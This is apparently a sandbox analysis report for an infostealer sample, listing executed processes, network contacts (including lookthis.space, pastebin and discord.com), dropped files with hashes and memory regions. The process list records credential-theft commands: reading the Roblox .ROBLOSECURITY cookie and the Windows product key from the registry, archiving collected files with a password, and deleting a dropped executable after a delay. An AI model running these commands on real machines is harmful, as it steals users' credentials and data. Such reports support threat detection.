C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5.tmp" "c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3deb661f-065c-4bb4-a64e-9c6422f27542.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\launch.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\inject.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 lookthis.space udp
DE 194.58.33.244:6455 lookthis.space tcp
US 8.8.8.8:53 244.33.58.194.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 216.58.204.67:443 gstatic.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 172.67.147.44:80 lostyawolfer.com tcp
US 172.67.147.44:80 lostyawolfer.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.136.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe

MD5 aa456e4c575655fe9bb3c77802001a79
SHA1 56fcf170358da522c856fad9c9baea64ea90d04c
SHA256 eff428d886d5836082ce5d6ea48af9a2fd411188a8be54f7f67ff3d9ba557a44
SHA512 1f05f12ba147258c388791689b678fab42a09cef555493753f06cbc1e388ebeebab902599bf644d01bf52d0d9a85a33ad70bc39669df2ceb32f9740219fe0c38

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

MD5 931e3a4dfad1c04af1d80eb2cd987b7b
SHA1 90eba783f06a4894f24dad8a1110c4c7d8885300
SHA256 51d852e08df68b5621226472ba8557627aede1b867d12c9592c69a088f124cf7
SHA512 ae39076ef00914ce8d6bcf032eab04c7da99fd79c97f5d0b9e305f6355adf2399be39945d4d29917c89f9fde4e1c4402528671e4f4279e71b54639338e60db2f

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe

MD5 8cd64540e579ed3add4ee8f77615367d
SHA1 1581bc9c7f6fe0539fd9f4719eb0041c9433205f
SHA256 eb6e35374536bf45bdbd5795cb14752751632e77dbe1e126d8c3daf66a4ae894
SHA512 5b62686686323ea3f0615870628e715ba3b1206f3d1922c5a2740bc17492abbdd4415847be5bf47b263582ffb93898ae9be9cfc7a18729dc548cb429676e9675

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe

MD5 c120a1ccbc020aab46360fd35b3c87d2
SHA1 1df6a54150310fb38c9a133db335901a64866baf
SHA256 39cd21551f2b655c467ed3746a21bfc2a876fcf96ad48b46ab61dc3e76bc37cb
SHA512 844d48458f6efb7eb4a464076b9dc9dbdcddb8da02773cf0ef8520a470ee21fd0186d18b7a313dc7aefaddd03e5cc594a3c3bebd415ce19cb5337de35ab06207

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

MD5 430bac2ee9d1186695aebd8d8214ef4a
SHA1 e7d77e6267e55981ea416ae9bd0ee5935c75c358
SHA256 e1d762a616beb12494593f6a9d6854a6f7ed2bffff0b3254abe62440bde09290
SHA512 a18b20ed7313fbc5be5a095e9f0b2aa4010cb1cfa3763c3841e8731ad331805829bd4a375715ea57cd4addc2a90838f26fc4af03b0b3f39af87d821054c1a6aa

memory/1392-58-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1392-57-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1392-56-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1392-55-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1392-54-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1392-62-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1984-69-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-70-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-84-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-88-0x00000231D9100000-0x00000231D9120000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20042\python312.dll

MD5 6f7c42579f6c2b45fe866747127aef09
SHA1 b9487372fe3ed61022e52cc8dbd37e6640e87723
SHA256 07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5
SHA512 aadf06fd6b4e14f600b0a614001b8c31e42d71801adec7c9c177dcbb4956e27617fa45ba477260a7e06d2ca4979ed5acc60311258427ee085e8025b61452acec

memory/1984-100-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-102-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-103-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2360-104-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp

memory/1984-101-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-98-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20042\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/1984-85-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-83-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-81-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1984-79-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20042\base_library.zip

MD5 21bf7b131747990a41b9f8759c119302
SHA1 70d4da24b4c5a12763864bf06ebd4295c16092d9
SHA256 f36454a982f5665d4e7fcc69ee81146965358fcb7f5d59f2cd8861ca89c66efa
SHA512 4cb45e9c48d4544c1a171d88581f857d8c5cf74e273bb2acf40a50a35c5148fe7d6e9afcf5e1046a7d7ae77f9196f7308ae3869c18d813fcd48021b4d112deb5

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ctypes.pyd

MD5 0f090d4159937400db90f1512fda50c8
SHA1 01cbcb413e50f3c204901dff7171998792133583
SHA256 ae6512a770673e268554363f2d1d2a202d0a337baf233c3e63335026d223be31
SHA512 151156a28d023cf68fd38cbecbe1484fc3f6bf525e7354fcced294f8e479e07453fd3fc22a6b8d049ddf0ad6306d2c7051ece4e7de1137578541a9aabefe3f12

memory/2360-127-0x00007FFFE8E90000-0x00007FFFE8E9F000-memory.dmp

memory/2360-126-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ssl.pyd

MD5 34402efc9a34b91768cf1280cc846c77
SHA1 20553a06fe807c274b0228ec6a6a49a11ec8b7c1
SHA256 fe52c34028c5d62430ea7a9be034557ccfecdddda9c57874f2832f584fedb031
SHA512 2b8a50f67b5d29db3e300bc0dd670dad0ba069afa9acf566cad03b8a993a0e49f1e28059737d3b21cef2321a13eff12249c80fa46832939d2bf6d8555490e99c

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_sqlite3.pyd

MD5 37a88a19bb1de9cf33141872c2c534cb
SHA1 a9209ec10af81913d9fd1d0dd6f1890d275617e8
SHA256 cca0fbe5268ab181bf8afbdc4af258d0fbd819317a78ddd1f58bef7d2f197350
SHA512 3a22064505b80b51ebaa0d534f17431f9449c8f2b155ec794f9c4f5508470576366ed3ba5d2de7ddf1836c6e638f26cad8cb0cc496daf30ee38ca97557238733

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_socket.pyd

MD5 f52c1c015fb147729a7caab03b2f64f4
SHA1 8aebc2b18a02f1c6c7494271f7f9e779014bee31
SHA256 06d91ac02b00a29180f4520521de2f7de2593dd9c52e1c2b294e717c826a1b7d
SHA512 8ab076c551f0a6ffe02c26b4f0fbb2ea7756d4650fe39f53d7bd61f4cb6ae81460d46d8535c89c6d626e7c605882b39843f7f70dd50e9daf27af0f8cadd49c0f

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_queue.pyd

MD5 97cc5797405f90b20927e29867bc3c4f
SHA1 a2e7d2399cca252cc54fc1609621d441dff1ace5
SHA256 fb304ca68b41e573713abb012196ef1ae2d5b5e659d846bbf46b1f13946c2a39
SHA512 77780fe0951473762990cbef056b3bba36cda9299b1a7d31d9059a792f13b1a072ce3ab26d312c59805a7a2e9773b7300b406fd3af5e2d1270676a7862b9ca48

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_lzma.pyd

MD5 17082c94b383bca187eb13487425ec2c
SHA1 517df08af5c283ca08b7545b446c6c2309f45b8b
SHA256 ddbfef8da4a0d8c1c8c24d171de65b9f4069e2edb8f33ef5dfecf93cb2643bd4
SHA512 2b565d595e9a95aefae396fc7d66ee0aeb9bfe3c23d64540ba080ba39a484ab1c50f040161896cca6620c182f0b02a9db677dab099dca3cae863e6e2542bb12c

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_hashlib.pyd

MD5 4dd4c7d3a7b954a337607b8b8c4a21d1
SHA1 b6318b830d73cbf9fa45be2915f852b5a5d81906
SHA256 926692fcecdb7e65a14ac0786e1f58e880ea8dae7f7bb3aa7f2c758c23f2af70
SHA512 dab02496c066a70a98334e841a0164df1a6e72e890ce66be440b10fdeecdfe7b8d0ec39d1af402ae72c8aa19763c92dd7404f3a829c9fdcf871c01b1aed122e1

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_decimal.pyd

MD5 a592ba2bb04f53b47d87b4f7b0c8b328
SHA1 ca8c65ab0aab0f98af8cc1c1cf31c9744e56a33c
SHA256 19fe4a08b0b321ff9413da88e519f4a4a4510481605b250f2906a32e8bb14938
SHA512 1576fdc90d8678da0dab8253fdd8ec8b3ce924fa392f35d8c62207a85c31c26dae5524e983e97872933538551cbef9cd4ba9206bcd16f2ae0858ab11574d09e0

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_bz2.pyd

MD5 adaa3e7ab77129bbc4ed3d9c4adee584
SHA1 21aabd32b9cbfe0161539454138a43d5dbc73b65
SHA256 a1d8ce2c1efaa854bb0f9df43ebccf861ded6f8afb83c9a8b881904906359f55
SHA512 b73d3aba135fb5e0d907d430266754da2f02e714264cd4a33c1bfdeda4740bbe82d43056f1a7a85f4a8ed28cb7798693512b6d4cdb899ce65b6d271cf5e5e264

C:\Users\Admin\AppData\Local\Temp\_MEI20042\unicodedata.pyd

MD5 2730c614d83b6a018005778d32f4faca
SHA1 611735e993c3cc73ecccb03603e329d513d5678a
SHA256 baa76f6fd87d7a79148e32d3ae38f1d1fe5a98804b86e636902559e87b316e48
SHA512 9b391a62429cd4c40a34740ddb04fa4d8130f69f970bb94fa815485b9da788bca28681ec7d19e493af7c99a2f3bf92c3b53339ef43ad815032d4991f99cc8c45

C:\Users\Admin\AppData\Local\Temp\_MEI20042\sqlite3.dll

MD5 de562be5de5b7f3a441264d4f0833694
SHA1 b55717b5cd59f5f34965bc92731a6cea8a65fd20
SHA256 b8273963f55e7bf516f129ac7cf7b41790dffa0f4a16b81b5b6e300aa0142f7e
SHA512 baf1fbdd51d66ea473b56c82e181582bf288129c7698fc058f043ccfbcec1a28f69d89d3cfbfee77a16d3a3fd880b3b18fd46f98744190d5b229b06cf07c975a

C:\Users\Admin\AppData\Local\Temp\_MEI20042\select.pyd

MD5 9a59688220e54fec39a6f81da8d0bfb0
SHA1 07a3454b21a831916e3906e7944232512cf65bc1
SHA256 50e969e062a80917f575af0fe47c458586ebce003cf50231c4c3708da8b5f105
SHA512 7cb7a039a0a1a7111c709d22f6e83ab4cb8714448daddb4d938c0d4692fa8589baa1f80a6a0eb626424b84212da59275a39e314a0e6ccaae8f0be1de4b7b994e

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libssl-3.dll

MD5 b2e766f5cf6f9d4dcbe8537bc5bded2f
SHA1 331269521ce1ab76799e69e9ae1c3b565a838574
SHA256 3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4
SHA512 5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libcrypto-3.dll

MD5 8377fe5949527dd7be7b827cb1ffd324
SHA1 aa483a875cb06a86a371829372980d772fda2bf9
SHA256 88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d
SHA512 c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

C:\Users\Admin\AppData\Local\Temp\_MEI20042\blank.aes

MD5 e8f81c4b5a5f827e7cd7f4d27d9a256e
SHA1 0939047c36cce9b688a98ee4838f0d02e3a074e1
SHA256 903a0157b91ab35d726057c7eed51f0d7e33a67046139bab1b15ffd9abac6a87
SHA512 3bdb0270bf3ae829d5d7df4aafc75f00a3efaa9e6461368ec7f7d1ee8d796a9cd6545ac10817a82472d08568a0bdfe20399fc607bc23e8a03cb039b463fec91b

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/2360-133-0x00007FFFE4D50000-0x00007FFFE4D7D000-memory.dmp

memory/2360-137-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp

memory/2360-135-0x00007FFFE4D30000-0x00007FFFE4D4A000-memory.dmp

memory/2360-141-0x00007FFFE4C90000-0x00007FFFE4CA9000-memory.dmp

memory/2360-143-0x00007FFFE4C80000-0x00007FFFE4C8D000-memory.dmp

memory/2360-147-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp

memory/2360-149-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp

memory/2360-150-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp

memory/2360-148-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp

memory/2360-139-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp

memory/2360-156-0x00007FFFE4C70000-0x00007FFFE4C7D000-memory.dmp

memory/2360-161-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat

MD5 9475f5f81b0779d8355fd4236a9bc1ef
SHA1 e7d4be0e36dbe5150a04c3dfc6ab4efbc15dec83
SHA256 0f48816f9d84dcbb1c3dc66755b136f7cfe392e522f5b2f3f70d1c685e3196ea
SHA512 c9a3f531dfdd57ec1dee42ab7450a95c2956134dbd946b928f3997fb8eab8e40640960060dbba6442b7758f78cec9f38fbc13258f7da494580ff1a3fe92852ef

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe

MD5 b92b0762f45046e240e3ac845a488038
SHA1 3e2664b0a3d9e620044f19f57b371656e760350b
SHA256 5cfca0d46d9b7a4d8826d57382eb748fca273fb989f038ce327c007492fe7c72
SHA512 460bca2a5bb512ed6866a972373c048e9ad0984e129dc3ca34e99eb54c531bfc9a5e4f170a8e4b53008471081c4564cf1c13d48b5e24cc35c51af12fa2f9a34f

memory/2592-165-0x0000000000670000-0x00000000007C0000-memory.dmp

memory/2360-153-0x00007FFFE3A60000-0x00007FFFE3A74000-memory.dmp

memory/2360-152-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp

memory/2592-169-0x0000000002860000-0x000000000286C000-memory.dmp

memory/2592-168-0x0000000002850000-0x000000000285C000-memory.dmp

memory/2592-172-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/2592-171-0x0000000002890000-0x000000000289C000-memory.dmp

memory/2592-175-0x0000000002910000-0x000000000291C000-memory.dmp

memory/2592-174-0x0000000002900000-0x0000000002908000-memory.dmp

memory/2592-173-0x00000000028F0000-0x00000000028FA000-memory.dmp

memory/2592-176-0x000000001B400000-0x000000001B408000-memory.dmp

memory/2592-170-0x0000000002880000-0x000000000288C000-memory.dmp

memory/2592-167-0x0000000002840000-0x0000000002850000-memory.dmp

memory/2592-166-0x0000000002830000-0x0000000002838000-memory.dmp

memory/2592-178-0x000000001B420000-0x000000001B42C000-memory.dmp

memory/2592-177-0x000000001B410000-0x000000001B41A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ljigho.zcq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5048-261-0x00000270B75E0000-0x00000270B7602000-memory.dmp

memory/2360-262-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp

memory/2360-285-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp

memory/5048-308-0x00000270B7650000-0x00000270B779F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45f53352160cf0903c729c35c8edfdce
SHA1 b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab
SHA256 9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2
SHA512 e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

memory/4824-314-0x0000028144C80000-0x0000028144DCF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline

MD5 e2478f5155d28cb1d5676d8e971c4171
SHA1 d4e74442ee8d7d089b246a5b77b9b65a8bd3d96e
SHA256 2127ead1f974f8966787dd9bdc132a2b56310dda2c80e0ce4b21737a2662acfb
SHA512 78ef72ef4eb385973a9cd75dbbb7ab2899b03ec2925e0aa87b2a0ea7621fe1dfc7ee2d8b25b480afb80db9abb266b966ba49ef20d8181ea481c54497ff934c68

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP

MD5 0703730abdcadf3f61737c0383e34e32
SHA1 64fa1857c2837329e1cb91c0e5ed999a1bb64a55
SHA256 0a6e699f658c7aecfa5ea5ce9f57047f76da23645d7849c67bdcce5fa689f96b
SHA512 0f9fb928fa344ce57a508823cf262191037713b585af4a1a4b7255cef4c92acfe46792a1a588405ff250b2d046604ae08b66449e3021bcaacd4e3601bb71fabb

C:\Users\Admin\AppData\Local\Temp\RESE5.tmp

MD5 39208e54313fcd43a8511f6d6deb4847
SHA1 bc79617389eaab0b7563ffc545ae9a2e18b740ae
SHA256 4f5cf32c4ad82f62c3ac28251d2e6c38557dd39d8b2fe54031254bf1b2ae15c2
SHA512 b44188af372a47c02eb10a0596ae0144f973705487626eeb34ee8d7b3fc1dde0c7f99af94924e067f55a304394bd9947362f665c64ba76494d5fa2791b8667af

memory/5092-345-0x000002151CFF0000-0x000002151CFF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.dll

MD5 af4131c9dce4b1a83a1b46244da121eb
SHA1 721873b133af7a17e5e3a9b60be26672e05b3047
SHA256 019ce8fdb5afb82485ffc51a288a0d1ea58a03b409071e64eb51761ec00d4960
SHA512 182d104edec8b7651742ae7e8340d8a80660dc9a32a91a2b9560995add18a95ad0f5ecf95f1713716ca26d76ecdaf468025d6ebf44e62c15f76e0a3c090c9f70

C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs

MD5 64c4edd589033cb8089e9c6e92dd8ab6
SHA1 7823043bb88e97c3c3b9a24aa71c691be0f07fc8
SHA256 4c0caad9e72fbdd3a5c770f4a7b2c2ef1c3d206862238a4ab7621ef2794dfa38
SHA512 7fee793519d648c3d6c49f96afaf8a2ad9dec8a0d0676a388f0b80a601874f178adb71f34203f524f1887155fff52dd4eff64c0963319335c740e1543229154c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ad0c2c170d8af41eceabc6f203429953
SHA1 6b5956063eb61a34aa8858b3fd74488e68345ad4
SHA256 8b7de0c3a86d1d8d4839df9ba808e7ee4761ada0020198532bb4bd266ea3aaf5
SHA512 315c56b62c953fa19b2b1af79087b11418f044e1d44ebf4f9d7204462b96a130cc6c82714c743e7e3ad44712fa77d65b6c10032eb6d230a63b44e90f3bebbd5a

memory/5092-353-0x0000021535220000-0x000002153536F000-memory.dmp

memory/2360-356-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp

memory/2360-355-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp

memory/2360-354-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp

memory/2804-364-0x0000019576990000-0x0000019576ADF000-memory.dmp

memory/5016-366-0x000002E7519A0000-0x000002E751AEF000-memory.dmp

memory/2360-367-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp

memory/2360-381-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp

memory/3716-435-0x000001B19F6E0000-0x000001B19F82F000-memory.dmp

memory/1692-445-0x00000221DBDA0000-0x00000221DBEEF000-memory.dmp

memory/2360-447-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp

memory/2360-453-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp

memory/2360-448-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp

memory/2324-471-0x000001931E360000-0x000001931E4AF000-memory.dmp

memory/3144-481-0x000001BE39E80000-0x000001BE39FCF000-memory.dmp

memory/2360-504-0x00007FFFE4C90000-0x00007FFFE4CA9000-memory.dmp

memory/2360-502-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp

memory/2360-506-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp

